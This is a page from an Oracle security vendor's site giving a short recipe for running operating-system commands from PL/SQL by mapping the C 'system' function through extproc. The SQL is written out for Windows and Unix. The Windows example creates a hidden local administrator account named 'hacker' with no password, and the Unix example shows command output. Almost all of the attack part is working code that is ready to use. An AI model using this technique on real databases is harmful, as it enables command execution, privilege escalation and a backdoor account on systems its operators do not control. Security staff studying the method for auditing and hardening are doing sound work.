Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Run OS commands via PL/SQL and Extproc

Documented way to run OS commands

Requirements

Running external procedure (extproc) in the listener
Create any library
Create (any) procedure
9i+: Environment setting containing the special DLL/Library
ENVS="EXTPROC_DLLS=ONLY:/home/xyz/mylib.so:/home/abc/urlib.so, EXTPROCT_DLLS=ANY

Code (Windows):

sqlplus system/manager
SQL> CREATE OR REPLACE LIBRARY exec_shell AS 'C:\windows\system32\msvcrt.dll';
SQL> CREATE OR REPLACE package oracmd
is procedure exec(cmdstring IN CHAR);
end oracmd;
/

SQL> CREATE OR REPLACE package body oracmd IS
procedure exec(cmdstring IN CHAR)
is external NAME "system"
library exec_shell
LANGUAGE C;
end oracmd;
/

Create new Windows Administrator
SQL> exec oracmd.exec('net user hacker nopassword /ADD');
SQL> exec oracmd.exec('net localgroup /ADD Administrators hacker');

Code (Unix):

sqlplus system/manager
create or replace library exec_shell
as
'/lib/libc-2.2.5.so';
/
create or replace package oracmd is
procedure exec(cmdstring IN CHAR);
end oracmd;
/

create or replace package body oracmd is
procedure exec(cmdstring IN CHAR)
is external
name "system"
library exec_shell
language c;
end oracmd;
/
SQL> exec oracmd.exec('ls');
hello_oracle.txt
PL/SQL procedure successfully completed.